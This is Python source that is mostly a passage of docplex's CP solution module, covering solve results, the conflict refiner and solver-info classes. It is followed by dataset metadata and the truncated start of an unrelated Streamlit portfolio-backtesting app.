get_search_status(self):\n \"\"\" Gets the search status.\n\n This solver information is provided by the COS 12.8 CP solver in addition/replacement to solve_status.\n Value is None if the solver is earlier than this version.\n\n Returns:\n Search status, element of the global list :const:`ALL_SEARCH_STATUSES`.\n None if not defined.\n \"\"\"\n return self.search_status\n\n\n def get_stop_cause(self):\n \"\"\" Gets the stop cause.\n\n This solver information is provided by the COS 12.8 CP solver in addition/replacement to fail_status.\n Value is None if the solver is earlier than this version.\n\n Returns:\n Stop cause, element of the global list :const:`ALL_STOP_CAUSES`.\n None if not defined.\n \"\"\"\n return self.stop_cause\n\n\n def is_solution(self):\n \"\"\" Checks if this descriptor is a valid solution to the problem.\n\n A solution is present if the solve status is 'Feasible' or 'Optimal'.\n Optimality of the solution should be tested using method :meth:`is_solution_optimal()`.\n\n Returns:\n True if this descriptor is a valid solution to the problem.\n \"\"\"\n return self.is_a_solution\n #return ((self.solve_status in (SOLVE_STATUS_FEASIBLE, SOLVE_STATUS_OPTIMAL)) and (self.fail_status != FAIL_STATUS_FAILED_NORMALLY)) \\\n # or ((self.solve_status == SOLVE_STATUS_UNKNOWN) and (self.fail_status == FAIL_STATUS_HAS_NOT_FAILED))\n #return ((self.solve_status in (SOLVE_STATUS_FEASIBLE, SOLVE_STATUS_OPTIMAL)) and (self.fail_status != FAIL_STATUS_SEARCH_COMPLETED)) \\\n # or ((self.solve_status == SOLVE_STATUS_UNKNOWN) and (self.fail_status == FAIL_STATUS_HAS_NOT_FAILED))\n\n\n def is_solution_optimal(self):\n \"\"\" Checks if this descriptor contains an optimal solution to the problem.\n\n Returns:\n True if there is a solution that is optimal.\n \"\"\"\n return self.solve_status == SOLVE_STATUS_OPTIMAL\n\n\n def map_solution(self, sobj):\n \"\"\" Map a python object on this solution.\n\n This method builds a copy of the source object and replace in its attributes all occurrences of\n model expressions by their value in this solution.\n This method is called recursively on all child objects.\n\n Args:\n sobj: Source object\n Returns:\n Copy of the source object where model expressions are replaced by their values\n \"\"\"\n return self.solution.map_solution(sobj)\n\n\n def __nonzero__(self):\n \"\"\" Check if this descriptor contains a solution to the problem.\n Equivalent to is_solution()\n\n Returns:\n True if a solution is available (Search status is 'Feasible' or 'Optimal')\n \"\"\"\n return self.is_solution()\n\n\n def __bool__(self):\n \"\"\" Check if this descriptor contains a solution to the problem.\n Equivalent to is_solution()\n\n Equivalent to __nonzero__ for Python 3\n\n Returns:\n True if a solution is available (Search status is 'Feasible' or 'Optimal')\n \"\"\"\n return self.is_solution()\n\n\n def get_solution(self):\n \"\"\" Get the model solution\n\n Returns:\n Model solution, object of class :class:`CpoModelSolution`.\n \"\"\"\n return self.solution\n\n\n def get_objective_values(self):\n \"\"\" Gets the numeric values of all objectives.\n\n Returns:\n Array of all objective values, None if none.\n \"\"\"\n return self.solution.get_objective_values()\n\n\n def get_objective_bounds(self):\n \"\"\" Gets the numeric values of all objectives bound.\n\n Note that when :meth:`~docplex.cp.modeler.minimize_static_lex` or :meth:`~docplex.cp.modeler.maximize_static_lex` is used,\n the bound values must be taken as a whole, as are the values delivered by :meth:`get_objective_values`.\n One cannot interpret bound values on each criterion independently.\n For example, suppose, we have a problem with two criteria specified to minimize_static_lex,\n a number of workers, and a number of days to complete a job.\n That is, we always prefer to use less workers, but for equal numbers of workers, we prefer to take less days.\n Then a solution with 3 workers and 10 days is perfectly compatible with a lower bound of 2 workers and 13 days,\n even though the lower bound on the number of days is higher than the value in the solution.\n\n Returns:\n Array of all objective bound values, None if none.\n \"\"\"\n return self.solution.get_objective_bounds()\n\n\n def get_objective_gaps(self):\n \"\"\" Gets the numeric values of the gap between objective value and objective bound.\n\n For a single objective, gap is calculated as gap = \\|value - bound\\| / max(1e-10, \\|value\\|)\n\n For multiple objectives, each gap is the gap between corresponding value and bound.\n However, after the first gap whose value is not within optimality tolerance specified by\n :attr:`~docplex.cp.CpoParameters.OptimalityTolerance` and :attr:`~docplex.cp.CpoParameters.RelativeOptimalityTolerance`,\n all returned gap values are positive infinity.\n\n Returns:\n Array of all objective gap values, None if not defined.\n \"\"\"\n return self.solution.objective_gaps\n\n\n def get_kpis(self):\n \"\"\" Get the solution kpis\n\n Returns:\n Dictionary containing value of the KPIs that have been defined in the model.\n \"\"\"\n return self.solution.get_kpis()\n\n\n def _set_model_attributes(self, nbintvars=0, nbitvvars=0, nbseqvars=0, nbctrs=0):\n \"\"\" Set the general model attributes.\n\n This method is called when solve is done on the cloud, when not all information is available from the solver.\n\n Args:\n nbintvars: Number of integer variables\n nbitvvars: Number of interval variables\n nbseqvars: Number of sequence variables\n nbctrs: Number of constraints\n \"\"\"\n self.solver_infos[CpoSolverInfos.NUMBER_OF_INTEGER_VARIABLES] = nbintvars\n self.solver_infos[CpoSolverInfos.NUMBER_OF_INTERVAL_VARIABLES] = nbitvvars\n self.solver_infos[CpoSolverInfos.NUMBER_OF_SEQUENCE_VARIABLES] = nbseqvars\n self.solver_infos[CpoSolverInfos.NUMBER_OF_CONSTRAINTS] = nbctrs\n\n\n def _set_solve_time(self, time):\n \"\"\" Set the solve time required for this solution.\n\n Args:\n time (float): Solve time in seconds\n \"\"\"\n self.solveTime = time\n\n\n def get_solve_time(self):\n \"\"\" Gets the solve time required for this solution.\n\n Returns:\n (float) Solve time in seconds.\n \"\"\"\n return self.solveTime\n\n\n def get_var_solution(self, name):\n \"\"\" Gets a variable solution from this model solution.\n\n Args:\n name: Variable name or variable expression.\n Returns:\n Variable solution, object of class :class:`CpoVarSolution`, None if not found.\n \"\"\"\n return self.solution.get_var_solution(name)\n\n\n def get_all_var_solutions(self):\n \"\"\" Gets the list of all variable solutions from this model solution.\n\n Returns:\n List of all variable solutions (class :class:`CpoVarSolution`).\n \"\"\"\n return self.solution.get_all_var_solutions()\n\n\n def get_value(self, name):\n \"\"\" Gets the value of a variable.\n\n For IntVar, value is an integer.\n For IntervalVar, value is a tuple (start, end, size), () if absent.\n For SequenceVar, value is list of interval variable solutions.\n For StateFunction, value is list of steps.\n\n Args:\n name: Variable name, or model variable descriptor.\n Returns:\n Variable value, None if variable is not found.\n \"\"\"\n return self.solution.get_value(name)\n\n\n def _add_json_solution(self, jsol, expr_map):\n \"\"\" Add a json solution to this result descriptor\n\n Args:\n jsol: JSON document representing solution.\n expr_map: Map of model expressions. Key is name in JSON document, value is corresponding model expression.\n \"\"\"\n # Notify run result about JSON document\n self._set_json_doc(jsol)\n\n # Add solution\n self.solution._add_json_solution(jsol, expr_map, self.model, self.parameters)\n\n # Add solver status\n status = jsol.get('solutionStatus', None)\n if status:\n self.solve_status = status.get('solveStatus', self.solve_status)\n self.fail_status = status.get('failStatus', self.fail_status)\n self.search_status = status.get('SearchStatus')\n self.stop_cause = status.get('SearchStopCause')\n\n nsts = status.get('nextStatus')\n if nsts in ('NextFalse', 'NextTerminated'):\n # Only for end of search_next\n self.fail_status = FAIL_STATUS_SEARCH_COMPLETED\n self.is_a_solution = (self.solve_status == SOLVE_STATUS_OPTIMAL) \\\n and (self.solution.get_objective_values() is not None)\n else:\n rto = jsol.get('responseTo', None)\n if rto == 'Propagate':\n self.is_a_solution = (self.solve_status != SOLVE_STATUS_INFEASIBLE) and (self.search_status == SEARCH_STATUS_COMPLETED)\n else:\n self.is_a_solution = self.solve_status in (SOLVE_STATUS_FEASIBLE, SOLVE_STATUS_OPTIMAL)\n\n\n def __getitem__(self, name):\n \"\"\" Overloading of [] to get a variable solution from this model solution\n\n Args:\n name: Variable name or CPO variable expression\n Returns:\n Variable solution (class CpoVarSolution)\n \"\"\"\n return self.get_value(name)\n\n\n def print_solution(self, out=None):\n \"\"\" Prints the solution on a given output.\n\n If the given output is a string, it is considered as a file name that is opened by this method\n using 'utf-8' encoding.\n\n DEPRECATED. Use write() instead.\n\n Args:\n out: Target output stream or output file, standard output if not given.\n \"\"\"\n self.write(out)\n\n\n def write(self, out=None):\n \"\"\" Write the solve result\n\n If the given output is a string, it is considered as a file name that is opened by this method\n using 'utf-8' encoding.\n\n Args:\n out (Optional): Target output stream or file name. If not given, default value is sys.stdout.\n \"\"\"\n # Check file\n if is_string(out):\n with open_utf8(os.path.abspath(out), mode='w') as f:\n self.write(f)\n return\n # Check default output\n if out is None:\n out = sys.stdout\n\n # Print model attributes\n sinfos = self.get_solver_infos()\n out.write(u\"-------------------------------------------------------------------------------\\n\")\n out.write(u\"Model constraints: \" + str(sinfos.get_number_of_constraints()))\n out.write(u\", variables: integer: \" + str(sinfos.get_number_of_integer_vars()))\n out.write(u\", interval: \" + str(sinfos.get_number_of_interval_vars()))\n out.write(u\", sequence: \" + str(sinfos.get_number_of_sequence_vars()))\n out.write(u'\\n')\n\n # Print search/solve status\n s = self.get_search_status()\n if s:\n out.write(u\"Solve status: \" + str(self.get_solve_status()) + \"\\n\")\n out.write(u\"Search status: \" + str(s))\n s = self.get_stop_cause()\n if s:\n out.write(u\", stop cause: \" + str(s))\n out.write(u\"\\n\")\n else:\n # Old fashion\n out.write(u\"Solve status: \" + str(self.get_solve_status()) + \", Fail status: \" + str(self.get_fail_status()) + \"\\n\")\n # Print solve time\n out.write(u\"Solve time: \" + str(round(self.get_solve_time(), 2)) + \" sec\\n\")\n out.write(u\"-------------------------------------------------------------------------------\\n\")\n\n self.solution.write(out)\n\n\n def write_in_string(self):\n \"\"\" Build a string representation of this object.\n\n The string that is returned is the same than what is printed by calling :meth:`write`.\n\n Returns:\n String representation of this object.\n \"\"\"\n out = StringIO()\n self.write(out)\n res = out.getvalue()\n out.close()\n return res\n\n\n def __str__(self):\n \"\"\" Build a short string representation of this object.\n Returns:\n String representation of this object.\n \"\"\"\n res = \"(model: {}, solve: {}, search: {}\".format(self.model.get_name(), self.get_solve_status(), self.get_search_status())\n if self.is_solution():\n res += \", solution: {}\".format(self.get_solution())\n res += \")\"\n return res\n\n\n def __eq__(self, other):\n \"\"\" Overwrite equality comparison\n\n Args:\n other: Other object to compare with\n Returns:\n True if this object is equal to the other, False otherwise\n \"\"\"\n return utils.equals(self, other)\n\n def __ne__(self, other):\n \"\"\" Overwrite inequality comparison \"\"\"\n return not self.__eq__(other)\n\n\nclass CpoRefineConflictResult(CpoRunResult):\n \"\"\" This class represents the result of a call to the conflict refiner.\n\n A conflict is a subset of the constraints and/or variables of the model which are\n mutually contradictory.\n\n The conflict refiner first examines the full infeasible model to identify portions of the conflict\n that it can remove. By this process of refinement, the conflict refiner arrives at a minimal conflict.\n A minimal conflict is usually smaller than the full infeasible model and thus makes infeasibility analysis easier.\n Since the conflict is minimal, removal of any one of these constraints will remove that particular cause\n for infeasibility.\n There may be other conflicts in the model; consequently, repair of a given conflict does not guarantee\n feasibility of the remaining model.\n If a model happens to include multiple independent causes of infeasibility,\n then it may be necessary for the user to repair one such cause and then repeat the diagnosis with further\n conflict analysis.\n \"\"\"\n def __init__(self, model):\n # \"\"\" Creates a new empty conflict refiner result.\n #\n # Args:\n # model: Related model\n # \"\"\"\n super(CpoRefineConflictResult, self).__init__(model)\n self.member_constraints = [] # List of member constraints\n self.possible_constraints = [] # List of possible member constraints\n self.member_variables = [] # List of member variables\n self.possible_variables = [] # List of possible member variables\n self.solver_infos = CpoSolverInfos() # Solving information\n self.cpo_conflict = None # Conflict in CPO format\n\n\n def get_all_member_constraints(self):\n \"\"\" Returns the list of all constraints that are certainly member of the conflict.\n\n Returns:\n List of model constraints (class CpoExpr) certainly member of the conflict.\n \"\"\"\n return self.member_constraints\n\n\n def get_all_possible_constraints(self):\n \"\"\" Returns the list of all constraints that are possibly member of the conflict.\n\n Returns:\n List of model constraints (class CpoExpr) possibly member of the conflict.\n \"\"\"\n return self.possible_constraints\n\n\n def get_all_member_variables(self):\n \"\"\" Returns the list of all variables that are certainly member of the conflict.\n\n Returns:\n List of model variables (class CpoIntVar or CpoIntervalVar) certainly member of the conflict.\n \"\"\"\n return self.member_variables\n\n\n def get_all_possible_variables(self):\n \"\"\" Returns the list of all variables that are possibly member of the conflict.\n\n Returns:\n List of model variables (class CpoIntVar or CpoIntervalVar) possibly member of the conflict.\n \"\"\"\n return self.possible_variables\n\n\n def get_cpo(self):\n \"\"\" Returns the conflict represented in CPO format.\n\n Returns:\n String containing the conflict in CPO format, None if not given.\n \"\"\"\n return self.cpo_conflict\n\n\n def is_conflict(self):\n \"\"\" Checks if this descriptor contains a valid conflict.\n\n Returns:\n True if there is a conflict, False otherwise.\n \"\"\"\n return len(self.member_constraints) != 0 or len(self.possible_constraints) != 0 \\\n or len(self.member_variables) != 0 or len(self.possible_variables) != 0\n\n\n def __nonzero__(self):\n \"\"\" Check if this descriptor contains a conflict.\n Equivalent to is_conflict()\n\n Returns:\n True if there is a conflict, False otherwise.\n \"\"\"\n return self.is_conflict()\n\n\n def __bool__(self):\n \"\"\" Check if this descriptor contains a conflict.\n Equivalent to is_conflict()\n\n Equivalent to __nonzero__ for Python 3\n\n Returns:\n True if there is a conflict, False otherwise.\n \"\"\"\n return self.is_conflict()\n\n\n def _add_json_solution(self, jsol, expr_map):\n \"\"\" Add a json solution to this result descriptor\n\n Args:\n jsol: JSON document representing solution.\n expr_map: Map of model expressions. Key is name in JSON document, value is corresponding model expression.\n \"\"\"\n # Notify run result about JSON document\n self._set_json_doc(jsol)\n\n # Get conflict data\n conflict = jsol.get('conflict')\n if conflict is None:\n return\n\n # Add constraints\n for name, status in conflict.get('constraints', {}).items():\n expr = _get_expr_from_map(expr_map, name)\n if status == 'ConflictMember':\n self.member_constraints.append(expr)\n else:\n self.possible_constraints.append(expr)\n\n # Add variables\n vars = conflict.get('intVars', {}).copy()\n vars.update(conflict.get('intervalVars', {}))\n for name, status in vars.items():\n expr = _get_expr_from_map(expr_map, name)\n if status == 'ConflictMember':\n self.member_variables.append(expr)\n else:\n self.possible_variables.append(expr)\n\n\n def print_conflict(self, out=None):\n \"\"\" Prints this conflict on a given output.\n\n If the given output is a string, it is considered as a file name that is opened by this method\n using 'utf-8' encoding.\n\n DEPRECATED. Use :meth:`write` instead.\n\n Args:\n out: Target output stream or output file, standard output if not given.\n \"\"\"\n self.write(out)\n\n\n def write(self, out=None):\n \"\"\" Write the conflict\n\n If the given output is a string, it is considered as a file name that is opened by this method\n using 'utf-8' encoding.\n\n Args:\n out (Optional): Target output stream or file name. If not given, default value is sys.stdout.\n \"\"\"\n # Check file\n if is_string(out):\n with open_utf8(os.path.abspath(out), mode='w') as f:\n self.write(f)\n return\n # Check default output\n if out is None:\n out = sys.stdout\n\n out.write(u\"Conflict refiner result:\\n\")\n if not self.is_conflict():\n out.write(u\" No conflict\\n\")\n return\n\n # Print constraints in the conflict\n lc = self.get_all_member_constraints()\n if lc:\n out.write(u\"Member constraints:\\n\")\n for c in lc:\n out.write(u\" {}\\n\".format(_build_conflict_constraint_string(c)))\n lc = self.get_all_possible_constraints()\n if lc:\n out.write(u\"Possible member constraints:\\n\")\n for c in lc:\n out.write(u\" {}\\n\".format(_build_conflict_constraint_string(c)))\n\n # Print variables in the conflict\n lc = self.get_all_member_variables()\n if lc:\n out.write(u\"Member variables:\\n\")\n for c in lc:\n out.write(u\" {}\\n\".format(c))\n lc = self.get_all_possible_variables()\n if lc:\n out.write(u\"Possible member variables:\\n\")\n for c in lc:\n out.write(u\" {}\\n\".format(c))\n\n # Print cpo format if any\n cpo = self.get_cpo()\n if cpo:\n out.write(u\"Conflict in CPO format:\\n\")\n for line in cpo.splitlines():\n out.write(u\" \" + line + \"\\n\")\n\n\n def __str__(self):\n \"\"\" Build a string representation of this object.\n\n The string that is returned is the same than what is printed by calling :meth:`write`.\n\n Returns:\n String representation of this object.\n \"\"\"\n out = StringIO()\n self.write(out)\n res = out.getvalue()\n out.close()\n return res\n\n\n def __eq__(self, other):\n \"\"\" Overwrite equality comparison\n\n Args:\n other: Other object to compare with\n Returns:\n True if this object is equal to the other, False otherwise\n \"\"\"\n return utils.equals(self, other)\n\n\nclass CpoSolverInfos(InfoDict):\n \"\"\" Dictionary of various solver informations.\n\n This class groups various information returned by the solver at the end of the solve.\n It is implemented as an extension of the class :class:`docplex.cp.utils.InfoDict` and takes profit of\n the methods such as :meth:`~docplex.cp.utils.InfoDict.write` that allows to easily print\n the full content of the information structure.\n \"\"\"\n\n # Total number of constraints\n NUMBER_OF_CONSTRAINTS = 'NumberOfConstraints'\n\n # Total number of integer variables\n NUMBER_OF_INTEGER_VARIABLES = 'NumberOfIntegerVariables'\n\n # Total number of interval variables\n NUMBER_OF_INTERVAL_VARIABLES = 'NumberOfIntervalVariables'\n\n # Total number of sequence variables\n NUMBER_OF_SEQUENCE_VARIABLES = 'NumberOfSequenceVariables'\n\n # Total solve time\n SOLVE_TIME = 'SolveTime'\n\n def __init__(self):\n super(InfoDict, self).__init__()\n\n def get_number_of_integer_vars(self):\n \"\"\" Gets the number of integer variables in the model.\n\n Returns:\n Number of integer variables.\n \"\"\"\n return self.get(CpoSolverInfos.NUMBER_OF_INTEGER_VARIABLES, 0)\n\n\n def get_number_of_interval_vars(self):\n \"\"\" Gets the number of interval variables in the model.\n\n Returns:\n Number of interval variables.\n \"\"\"\n return self.get(CpoSolverInfos.NUMBER_OF_INTERVAL_VARIABLES, 0)\n\n\n def get_number_of_sequence_vars(self):\n \"\"\" Gets the number of sequence variables in the model.\n\n Returns:\n Number of sequence variables.\n \"\"\"\n return self.get(CpoSolverInfos.NUMBER_OF_SEQUENCE_VARIABLES, 0)\n\n\n def get_number_of_constraints(self):\n \"\"\" Gets the number of constraints in the model.\n\n Returns:\n Number of constraints.\n \"\"\"\n return self.get(CpoSolverInfos.NUMBER_OF_CONSTRAINTS, 0)\n\n\n def get_solve_time(self):\n \"\"\" Gets the total solve time.\n\n Returns:\n Total solve time in seconds, -1 if unknown\n \"\"\"\n return self.get(CpoSolverInfos.SOLVE_TIME, -1)\n\n\nclass CpoProcessInfos(InfoDict):\n \"\"\" Dictionary of various process information.\n\n This class groups various information related to the processing of the model by the Python API.\n It is implemented as an extension of the class :class:`~docplex.cp.utils.InfoDict` and takes profit of\n the methods such as :meth:`~docplex.cp.utils.InfoDict.write` that allows to easily print\n the full content of the information structure.\n\n Note that the content is purely informative. Information names and values depends on the implementation\n of the solver agent that has been used to solve the model.\n\n This class provides few methods to access the most important information stored in it.\n All information is available using regular dictionary access expression.\n \"\"\"\n\n # Name of the agent used to solve the model\n SOLVER_AGENT = \"SolverAgent\"\n\n # Model build time (time between model creation and last addition of an expression)\n MODEL_BUILD_TIME = \"ModelBuildTime\"\n\n # Attribute name for time needed to transform model into CPO format\n MODEL_COMPILE_TIME = \"ModelCompileTime\"\n\n # Attribute name for time needed to dump model in file and/or on log\n MODEL_DUMP_TIME = \"ModelDumpTime\"\n\n # Attribute name for time needed to submit the model to solver\n MODEL_SUBMIT_TIME = \"ModelSubmitTime\"\n\n # Attribute name for the size of the generated CPO model\n MODEL_DATA_SIZE = \"ModelDataSize\"\n\n # Attribute name for total solve time (including model send and response receive)\n SOLVE_TOTAL_TIME = \"TotalSolveTime\"\n\n # Attribute name for time needed to retrieve result\n RESULT_RECEIVE_TIME = \"ResultReceiveTime\"\n\n # Attribute name for size of the result string\n RESULT_DATA_SIZE = \"ResultDataSize\"\n\n # Attribute name for total time needed to parse JSON result\n TOTAL_JSON_PARSE_TIME = \"TotalJsonParseTime\"\n\n # Attribute name for size of the log data\n TOTAL_LOG_DATA_SIZE = \"TotalLogDataSize\"\n\n # Attribute name for total time needed to encode strings in UTF8\n TOTAL_UTF8_ENCODE_TIME = \"TotalUtf8EncodeTime\"\n\n # Attribute name for total time needed to decode strings from UTF-8\n TOTAL_UTF8_DECODE_TIME = \"TotalUtf8DecodeTime\"\n\n # Time needed to send model to the solver\n TOTAL_DATA_SEND_TIME = \"TotalDataSendTime\"\n\n # Total size of data sent to solver\n TOTAL_DATA_SEND_SIZE = \"TotalDataSendSize\"\n\n # Total size of data received from solver\n TOTAL_DATA_RECEIVE_SIZE = \"TotalDataReceiveSize\"\n\n\n def __init__(self):\n super(InfoDict, self).__init__()\n\n\n def get_model_build_time(self):\n \"\"\" Get the time spent to build the model.\n\n Modeling time is computed as the time spent between model creation and last addition of a model expression.\n\n Returns:\n Total modeling time in seconds.\n \"\"\"\n return self.get(CpoProcessInfos.MODEL_BUILD_TIME)\n\n\n def get_total_solve_time(self):\n \"\"\" Get the total solve time, including time to send model and retrieve result.\n\n Returns:\n Total solve time in seconds.\n \"\"\"\n return self.get(CpoProcessInfos.SOLVE_TOTAL_TIME)\n\n\n###############################################################################\n## Private functions\n###############################################################################\n\n# Constants conversion\n_NUMERIC_VALUES = {# Numeric value generated by CPO\n 'intmin': INT_MIN, 'intmax': INT_MAX,\n 'intervalmin': INTERVAL_MIN, 'intervalmax': INTERVAL_MAX,\n 'infinity': POSITIVE_INFINITY, '-infinity': NEGATIVE_INFINITY,\n # Numeric values generated by JSON\n 'NaN': float('nan'),\n 'Infinity': POSITIVE_INFINITY, '-Infinity': NEGATIVE_INFINITY}\n\n\n# Marker of interval with holes\n_HOLE_MARKER = \"holes\"\n\ndef _get_domain(val):\n \"\"\" Convert a solution value into domain.\n\n Args:\n val: Value to convert\n Returns:\n Variable domain\n \"\"\"\n if is_array(val):\n res = []\n for v in val:\n if is_array(v):\n vl = len(v)\n if vl == 2:\n res.append((_get_num_value(v[0]), _get_num_value(v[1])))\n elif vl == 3:\n res.append((_get_num_value(v[0]), _get_num_value(v[1]), _HOLE_MARKER))\n assert v[2] == _HOLE_MARKER, \"Domain interval with 3 elements must contains '{}' as last one\".format(_HOLE_MARKER)\n else:\n assert False, \"Domain interval should contain only 2 elements\"\n else:\n res.append(_get_num_value(v))\n return tuple(res)\n else:\n return _get_num_value(val)\n\n\ndef _get_interval(val):\n \"\"\" Convert a solution value given in JSON.\n\n Args:\n val: JSON value to convert\n Returns:\n Converted value\n \"\"\"\n if isinstance(val, list):\n lb, ub = val\n return (lb, ub) if lb != ub else _get_num_value(lb)\n return _get_num_value(val)\n\n\ndef _get_num_value(val):\n \"\"\" Convert a solution value into number.\n Interpret intmin, intmax, intervalmin, intervalmax, NaN, Infinity if any.\n\n Args:\n val: Value to convert\n Returns:\n Converted value, itself if not found\n \"\"\"\n return _NUMERIC_VALUES.get(val, val)\n\n\ndef _check_arg_domain(val, name):\n \"\"\" Check that an argument is a correct domain and raise error if wrong\n\n Domain is:\n * a single integer for a fixed domain\n * a list of integers or intervals expressed as tuples.\n\n Args:\n val: Argument value\n name: Argument name\n Returns:\n Domain to be set\n Raises:\n Exception if argument has the wrong format\n \"\"\"\n # Check single integer\n if is_int(val):\n return val\n # Check list of integers or tuples\n assert is_array(val), \"Argument '\" + name + \"' should be a list of integers and/or intervals\"\n for v in val:\n if not is_int(v):\n assert _is_domain_interval(v), \"Argument '\" + name + \"' should be a list of integers and/or intervals (tuples of 2 integers)\"\n return val\n\n\ndef _is_domain_interval(val):\n \"\"\" Check if a value is representing a valid domain interval\n Args:\n val: Value to check\n Returns:\n True if value is a tuple representing an interval\n \"\"\"\n if not isinstance(val, tuple):\n return False\n if not (is_int(val[0]) and is_int(val[1]) and (val[1] >= val[0])):\n return False\n vl = len(val)\n if vl == 2:\n return True\n if vl == 3:\n return val[2] == _HOLE_MARKER\n return False\n\n\ndef _build_conflict_constraint_string(ctr):\n \"\"\" Build the string used to represent a constraint in conflict refiner\n Args:\n ctr: Constraint to print\n Returns:\n Constraint string\n \"\"\"\n return str(ctr)\n\n\ndef _compute_gap(val, bnd):\n \"\"\" Compute the gap of a value\n Args:\n val: Objective value\n bnd: Objective bound\n Returns:\n Objective gap\n \"\"\"\n if val in (POSITIVE_INFINITY, NEGATIVE_INFINITY) or bnd in (POSITIVE_INFINITY, NEGATIVE_INFINITY):\n return POSITIVE_INFINITY\n if not is_number(val) or not is_number(bnd):\n return POSITIVE_INFINITY\n return float(abs(val - bnd)) / max(1e-10, abs(val))\n\n\ndef _is_below_tolerance(val, bnd, rt, at):\n \"\"\" Check if an objective value is in the tolerance with given bound.\n Args:\n val: Value to check\n bnd: Objective bound\n rt: Relative tolerance\n at: Absolute tolerance\n Returns:\n True if value is below the tolerance, false otherwise\n \"\"\"\n if not is_number(val) or not is_number(bnd):\n return False\n if val in (POSITIVE_INFINITY, NEGATIVE_INFINITY) or bnd in (POSITIVE_INFINITY, NEGATIVE_INFINITY):\n return False\n if val == bnd:\n return True\n if val < bnd: # Maximization\n val = -val\n bnd = -bnd\n return (val - at < bnd) or (val * (1 - rt) < bnd)\n\n\ndef _get_expr_from_map(expr_map, id):\n \"\"\" Retrieve a model expression from the map of CPO ids for expressions\n Args:\n expr_map: Map of model expressions. Key is name in JSON document, value is corresponding model expression.\n Returns:\n Model expression\n Raises:\n CpoException if expression is not found (should not happen)\n \"\"\"\n expr = expr_map.get(id)\n if expr is None:\n raise CpoException(\"INTERNAL ERROR: Solve result refers to '{}' that is not found in the map of expressions\".format(id))\n return expr\n\n\n","repo_name":"OscarJHernandez/qc_portfolio_optimization","sub_path":"venv/lib/python3.8/site-packages/docplex/cp/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":79398,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"61"} +{"seq_id":"31840996220","text":"import streamlit as st\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom universal import tools, algos\nfrom universal.algos import *\nimport re\nimport datetime\nimport os\ndef app():\n trading_fee = 0.05 # en pourcent\n st.title('APP5')\n st.write('Welcome to app5')\n\n algorithmes = [algos.Anticor(), algos.BAH(), algos.BCRP(), algos.BestMarkowitz(), algos.BestSoFar(), algos.BNN(),\n algos.CORN(), algos.CRP(), algos.CWMR(), algos.DynamicCRP(), algos.EG(), algos.OLMAR(), algos.ONS(),\n algos.PAMR(), algos.RMR()]\n noms_algos = ['Anticor', 'BAH', 'BCRP', 'BestMarkowitz', 'BestSoFar', 'BNN', 'CORN', 'CRP', 'CWMR', 'DynamicCRP',\n 'EG', 'OLMAR', 'ONS', 'PAMR', 'RMR']\n market_list = [\"Crypto\", \"Nasdaq\", \"Other\"]\n market = st.sidebar.radio(\"Sélectionner un type de marché\", market_list)\n if market == market_list[0]:\n mrkt = \"cryptos\"\n senari_list = [\"covid\", \"ukr_war\", \"année_2018\", \"année_2018_flat\", \"année_2019_flat\", \"année_2021_Nov\",\n \"année_2021_Oct\", \"random1\", \"random2\", \"random3\"]\n elif market == market_list[1]:\n mrkt = \"nasdaq\"\n senari_list = [\"covid\", \"ukr_war\", \"année_2018\", \"année_2018_flat\", \"année_2019_flat\", \"année_2021_Nov\",\n \"année_2021_Oct\", \"random1\", \"random2\", \"random3\", \"subprimes_DF\", \"new_millennium_DF\"]\n else:\n mrkt = 'other'\n senari_list = [\"covid\", \"ukr_war\", \"année_2018\", \"année_2018_flat\", \"année_2019_flat\", \"année_2021_Nov\",\n \"année_2021_Oct\", \"random1\", \"random2\", \"random3\", \"subprimes_DF\", \"new_millennium_DF\"]\n\n senar = st.sidebar.selectbox(\"Senari_list\", senari_list)\n if senar == senari_list[0]:\n snr = \"covid_DF\"\n elif senar == senari_list[1]:\n snr = \"ukr_war_DF\"\n elif senar == senari_list[2]:\n snr = \"année_2018_DF\"\n elif senar == senari_list[3]:\n snr = \"année_2018_flat_DF\"\n elif senar == senari_list[4]:\n snr = \"année_2019_flat_DF\"\n elif senar == senari_list[5]:\n snr = \"année_2021_Nov_DF\"\n elif senar == senari_list[6]:\n snr = \"année_2021_Oct_DF\"\n elif senar == senari_list[7]:\n snr = \"rdm1_DF\"\n elif senar == senari_list[8]:\n snr = \"rdm2_DF\"\n elif senar == senari_list[9]:\n snr = 'rdm3_DF'\n elif senar == senari_list[10]:\n snr = 'subprimes_DF'\n else:\n snr = 'new_millennium_DF'\n\n ### using Markdown\n st.markdown(\"## Let's have a look into our Senari\")\n df_crypto = pd.read_csv(f\"assets/{mrkt}/{snr}.csv\", index_col=0, parse_dates=[0])\n best_algo = pd.read_csv(f\"assets/best_models/{mrkt}/{snr}.csv\", index_col = 0)\n st.write(best_algo)\n close_list = []\n for j in df_crypto.columns:\n if \"Close\" in j:\n close_list.append(j)\n S = df_crypto[close_list]\n S = S.dropna(axis=1)\n st.write(S)\n liste_actions = st.selectbox(\"Choisir le marché\",\n close_list)\n window = 10\n wndw_nbr = S.shape[0] // window\n for j in S.columns:\n j_reg = j.replace(\"_Close\", \"\")\n df_crypto[f'{j_reg}_Weight'] = 0\n j = 0\n st.write(df_crypto)\n for i in best_algo['algo']:\n #st.write('j : ', j)\n if i != \"?\":\n algo = algorithmes[noms_algos.index(i)]\n #st.write(algo)\n result = algo.run(S.iloc[j * window: (j + 1) * window, :])\n #st.write(result.weights['BTC-USD_Close'])\n for e in result.weights.columns:\n e_reg = e.replace(\"_Close\", \"\")\n #st.write(e)\n #df_crypto[f'{e}_Weight'].iloc[j * window: (j + 1) * window +1, :] = result.weights[e]\n df_crypto[f\"{e_reg}_Weight\"].iloc[j * window:(j + 1) * window] = result.weights[e]\n # st.write(result.weights[e])\n\n j +=1\n st.write(df_crypto)\n def cash_update(c_start, c_end, csh_start, b_start, b_end, ft):\n gain = np.sum((c_end - c_start)* (b_start-b_end)*csh_start)\n return gain - gain*ft\n #def cash_update(c_start, c_end, csh_start, b_start, b_end, ft):\n l = 0\n\n for line in df_crypto.index:\n\n\n gain_list = []\n for k in S.columns:\n k_reg = k.replace(\"_Close\", \"\")\n gain_i = ((df_crypto[f'{k_reg}_Close'].iloc[l+1] - df_crypto[f'{k_reg}_Close'].iloc[(l)]))/df_crypto[f'{k_reg}_Close'].iloc[(l)]* (df_crypto[f'{k_reg}_Weight'].iloc[l])*df_crypto['Cashback'].iloc[l]\n #st.write(gain)\n gain_reel = gain_i - gain_i*trading_fee\n gain_list.append(gain_reel)\n\n #st.write(sum(gain_list))\n 